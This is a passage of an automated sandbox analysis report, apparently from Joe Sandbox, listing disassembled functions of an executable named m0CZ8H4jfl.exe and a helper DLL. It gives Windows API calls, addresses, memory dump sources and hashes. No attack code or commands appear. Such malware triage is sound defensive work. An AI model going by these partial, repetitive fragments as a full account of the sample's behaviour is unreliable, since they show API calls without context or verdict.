                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                          APIs
                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                          • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                          • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                          • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                          • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                          • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                          • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                          • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                          • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                          • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNELBASE(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocGlobal
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761449716-0
                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                          • ShowWindow.USER32(?,?), ref: 00405440
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00405461
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040536F
                                                                                                            • Part of subcall function 0040414E: SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                          • GetDlgItem.USER32(?,?), ref: 004054B3
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                          • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                          • ShowWindow.USER32(?,?), ref: 004054F1
                                                                                                          • ShowWindow.USER32(?), ref: 0040553B
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                          • CreatePopupMenu.USER32 ref: 00405580
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                          • EmptyClipboard.USER32 ref: 0040561B
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                          • CloseClipboard.USER32 ref: 00405676
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                          • String ID: {
                                                                                                          • API String ID: 590372296-366298937
                                                                                                          • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                          • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                          • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                          • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                            • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,?,00404770), ref: 00405791
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\m0CZ8H4jfl.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                            • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                            • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                            • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                          • API String ID: 2624150263-922056177
                                                                                                          • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                          • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                          • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                          • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                          APIs
                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                          • GlobalAlloc.KERNEL32(?,00001CA4), ref: 10001C24
                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4227406936-0
                                                                                                          • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                          • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                          • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                          • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                          • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                          • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                          • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                          • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                          APIs
                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404368
                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                          • GetSysColor.USER32(?), ref: 00404396
                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                          • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00404464
                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                          • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                          • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040451D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                          • String ID: -B@$Call$N$open
                                                                                                          • API String ID: 3615053054-1446803726
                                                                                                          • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                          • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                          • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                          • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                          • String ID: F
                                                                                                          • API String ID: 941294808-1304234792
                                                                                                          • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                          • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                          • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                          APIs
                                                                                                          • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                            • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
